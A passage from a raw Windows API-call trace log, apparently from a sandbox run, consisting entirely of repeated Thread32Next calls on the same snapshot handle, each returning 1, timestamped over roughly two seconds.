lpte=0x14fe78) returned 1 [0182.369] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.369] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.371] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.371] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.372] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.373] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.374] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.375] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.375] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.376] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.377] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.378] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.378] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.379] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.380] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.381] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.382] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.383] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.383] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.384] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.385] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.385] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.386] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.387] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.388] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.389] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.390] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.390] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.391] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.393] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.394] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.584] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.761] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.762] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.763] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.764] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.764] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.765] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.766] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.767] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.767] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.768] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.769] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.770] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.771] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.772] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.773] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.773] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.774] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.775] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.776] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.777] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.777] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.778] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.779] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.780] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.781] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.781] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.782] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.783] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.783] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.784] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.785] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.786] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.790] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.796] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0182.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.032] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.033] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.034] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.035] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.035] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.036] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.037] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.039] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.040] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.040] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.041] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.042] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.043] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.044] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.044] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.045] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.046] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.047] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.048] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.048] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.053] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.054] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.055] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.056] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.057] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.058] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.059] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.060] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.061] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.062] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.063] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.064] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.065] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.066] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.067] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.068] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.068] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.069] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.071] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.231] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.231] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.232] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.233] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.234] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.234] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.235] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.236] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.237] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.238] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.238] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.239] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.240] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.241] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.242] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.243] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.243] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.244] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.245] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.246] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.247] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.248] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.249] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.250] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.250] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.251] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.253] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.254] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.255] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.255] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.256] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.257] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.258] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.258] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.259] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.260] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.261] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.262] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.262] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.263] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.264] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.265] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.265] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.477] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.478] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.479] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.479] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.480] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.481] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.481] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.482] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.482] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.483] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.484] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.484] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.486] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.486] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.488] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.490] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.491] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.491] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.493] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.495] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.499] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.499] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.500] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.500] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.502] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.502] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.706] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.707] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.707] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.708] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.709] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.710] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.711] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.711] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.713] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.713] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.901] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.929] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.930] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.931] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.932] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0183.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0184.115] Thread32Next 